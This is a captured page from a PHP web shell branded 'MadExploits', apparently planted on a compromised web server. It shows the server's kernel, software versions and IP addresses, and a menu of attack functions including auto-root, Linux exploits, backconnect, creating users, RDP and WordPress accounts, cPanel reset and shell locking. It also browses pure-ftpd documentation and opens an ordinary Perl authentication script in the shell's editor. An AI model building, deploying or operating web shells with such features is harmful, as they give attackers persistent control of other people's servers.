Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
pure-ftpd-1.0.47 /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
7.26
KB
-rw-r--r--
CONTACT
358
B
-rw-r--r--
FAQ
31.79
KB
-rw-r--r--
HISTORY
2.19
KB
-rw-r--r--
NEWS
43.78
KB
-rw-r--r--
README
74.07
KB
-rw-r--r--
README.Authentication-Modules
4.64
KB
-rw-r--r--
README.Configuration-File
1.1
KB
-rw-r--r--
README.Contrib
4.05
KB
-rw-r--r--
README.Donations
4.51
KB
-rw-r--r--
README.LDAP
10.14
KB
-rw-r--r--
README.MySQL
8.94
KB
-rw-r--r--
README.PGSQL
8.21
KB
-rw-r--r--
README.TLS
8.79
KB
-rw-r--r--
README.Virtual-Users
11.67
KB
-rw-r--r--
THANKS
13.69
KB
-rw-r--r--
pure-stat.pl
5.28
KB
-rwxr-xr-x
pure-vpopauth.pl
1.44
KB
-rwxr-xr-x
pureftpd.schema
2.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pure-vpopauth.pl
#! /usr/bin/env perl -w # - authentication module for pure-ftpd using vpasswd vpopmail password files. # - Saturday, 12 May 2002 - released # - copyright (c) Dan Caescu - daniel@guitar.ro , jamie_fd@yahoo.com # - vpopmail has to be compiled with clear text passwords in order for # - this to work. # - also, there would be great if you would run pure-ftpd with chroot flags # - 17 Nov 2002, added e-mail checking, a hint from Frank Jedi @ pureftpd # - I guess it works..? :) # - greets to Rox (Roxana Raluca) . # Change the following settings according to your needs $VPOPMAIL_PATH = '/usr/local/vpopmail'; $UID = 1000; $GID = 1000; # Don't change anything below that line $AUTHD_ACCOUNT = $ENV{AUTHD_ACCOUNT} or die; $AUTHD_PASSWORD = $ENV{AUTHD_PASSWORD} or die; # Checking if AUTHD_ACCOUNT is like user@domain $AUTHD_ACCOUNT =~ /^[^@]+\@([a-z0-9]+\.)+[a-z]+$/i or die; # We take care of the user/domain pair 'cause the user comes # in the user@domain style @user_domain = split('@', $AUTHD_ACCOUNT); open (FILE, "$VPOPMAIL_PATH/domains/" . $user_domain[1] . '/vpasswd') or die; # We take care of the user/pass from vpasswd while (<FILE>) { chomp; @date_useri = split ':'; if ($user_domain[0] eq $date_useri[0] && $AUTHD_PASSWORD eq $date_useri[7]) { print "auth_ok:1\n", "uid:$UID\n", "gid:$GID\n", "dir:$date_useri[5]\n", "end\n"; last; } } close FILE;
Close